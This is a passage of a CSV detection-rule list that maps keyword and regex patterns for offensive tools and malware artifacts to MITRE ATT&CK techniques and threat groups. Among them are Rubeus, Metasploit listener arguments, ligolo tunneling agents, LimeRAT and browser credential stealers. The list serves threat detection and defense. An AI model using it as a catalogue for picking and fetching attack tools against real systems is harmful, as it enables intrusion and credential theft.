etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","1","N/A","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","50985" "*lgandx/Responder-Windows*",".{0,1000}lgandx\/Responder\-Windows.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","1","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","50986" "*LgBkAGwAbAAAAAAASgAVAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABTAGgAYQByAHAAUwBo*",".{0,1000}LgBkAGwAbAAAAAAASgAVAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABTAGgAYQByAHAAUwBo.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","50987" "*lgmpcpglpngdoalbgeoldeajfclnhafa*",".{0,1000}lgmpcpglpngdoalbgeoldeajfclnhafa.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50988" "*LHOST=* LPORT=*",".{0,1000}LHOST\=.{0,1000}\sLPORT\=.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT 
- Common Raven","Exploitation tool","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50989" "*liamg/traitor*",".{0,1000}liamg\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","1","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","50991" "*lib.obfuscator.randomizers.vbarandomizer*",".{0,1000}lib\.obfuscator\.randomizers\.vbarandomizer.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","50992" "*lib/Bruteforcer.cs*",".{0,1000}lib\/Bruteforcer\.cs.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50993" "*lib/ForgeTicket.*",".{0,1000}lib\/ForgeTicket\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","50994" "*lib/S4U.*",".{0,1000}lib\/S4U\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","50995" "*Libbpf-powered rootkit*",".{0,1000}Libbpf\-powered\srootkit.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","50996" "*LibcRealpathBufferUnderflow/RationalLove.c*",".{0,1000}LibcRealpathBufferUnderflow\/RationalLove\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - 
T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","50997" "*libFuzzer-HOWTO.*",".{0,1000}libFuzzer\-HOWTO\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50998" "*-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32*",".{0,1000}\-LIBGCCW32\-EH\-3\-SJLJ\-GTHR\-MINGW32.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","50999" "*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*",".{0,1000}libnfc_crypto1_crack\sa0a1a2a3a4a5\s0\sA\s4\sB.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51000" "*libnspr_nspr_log_file_priv_esc.*",".{0,1000}libnspr_nspr_log_file_priv_esc\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51001" "*libreoffice2john.py*",".{0,1000}libreoffice2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51002" "*libs/bofalloc*",".{0,1000}libs\/bofalloc.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","51003" "*libs/bofentry*",".{0,1000}libs\/bofentry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","51004" "*libs/bofhelper*",".{0,1000}libs\/bofhelper.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","0","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","51005" "*LibSnaffle.ActiveDirectory*",".{0,1000}LibSnaffle\.ActiveDirectory.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#content","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","51006" "*LibSnaffle.ActiveDirectory*",".{0,1000}LibSnaffle\.ActiveDirectory.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","51007" "*LibSnaffle.FileDiscovery*",".{0,1000}LibSnaffle\.FileDiscovery.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","51008" "*LibSnaffle.Logging*",".{0,1000}LibSnaffle\.Logging.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - 
TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","51009" "*libSSH-Authentication-Bypass*",".{0,1000}libSSH\-Authentication\-Bypass.{0,1000}","offensive_tool_keyword","POC","LibSSH Authentication bypass CVE-2018-10933 exploitation tool","T1210 - T1573 - T1553 - T1003 - T1059","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tool","https://github.com/nikhil1232/LibSSH-Authentication-Bypass","1","0","N/A","N/A","N/A","1","6","2","2018-12-19T15:46:37Z","2018-12-19T15:33:00Z","51010" "*libxpc_mitm_ssudo.*",".{0,1000}libxpc_mitm_ssudo\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51015" "*libxselinux.old*",".{0,1000}libxselinux\.old.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","51016" "*libxselinux.so*",".{0,1000}libxselinux\.so.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - 
T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","51017" "*lightsout.py*",".{0,1000}lightsout\.py.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","10","4","321","44","2024-07-15T21:29:16Z","2023-06-01T14:57:44Z","51019" "*LightsOut-master.zip*",".{0,1000}LightsOut\-master\.zip.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","10","4","321","44","2024-07-15T21:29:16Z","2023-06-01T14:57:44Z","51020" "*ligolo.lan*",".{0,1000}ligolo\.lan.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - 
LockBit","C2","https://github.com/sysdream/ligolo","1","0","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51021" "*ligolo_darwin*",".{0,1000}ligolo_darwin.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51022" "*ligolo_linux*",".{0,1000}ligolo_linux.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51023" "*ligolo_windows*.exe*",".{0,1000}ligolo_windows.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51024" "*ligolo-master*",".{0,1000}ligolo\-master.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - 
LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51025" "*ligolo-ng -selfcert*",".{0,1000}ligolo\-ng\s\-selfcert.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51026" "*ligolo-ng_agent*",".{0,1000}ligolo\-ng_agent.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","51027" "*ligolo-ng_proxy*",".{0,1000}ligolo\-ng_proxy.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","51028" "*ligolo-ng-master*",".{0,1000}ligolo\-ng\-master.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","51029" "*Lime-Crypter.exe*",".{0,1000}Lime\-Crypter\.exe.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","51030" "*LimeRAT v*/*",".{0,1000}LimeRAT\sv.{0,1000}\/.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","51031" "*Lime-RAT-87e189781c0aef0e84cabe2f8c2e7d8f5143e594.zip*",".{0,1000}Lime\-RAT\-87e189781c0aef0e84cabe2f8c2e7d8f5143e594\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","51032" "*LimerBoy/Adamantium-Thief*",".{0,1000}LimerBoy\/Adamantium\-Thief.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - 
T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","51033" "*LINDA.HARTLEY@TUTANOTA.COM*",".{0,1000}LINDA\.HARTLEY\@TUTANOTA\.COM.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51034" "*LinEnum.sh*",".{0,1000}LinEnum\.sh.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7309","2011","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z","51035" "*LinEnum-master.ip*",".{0,1000}LinEnum\-master\.ip.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7309","2011","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z","51036" "*linikatz.sh*",".{0,1000}linikatz\.sh.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 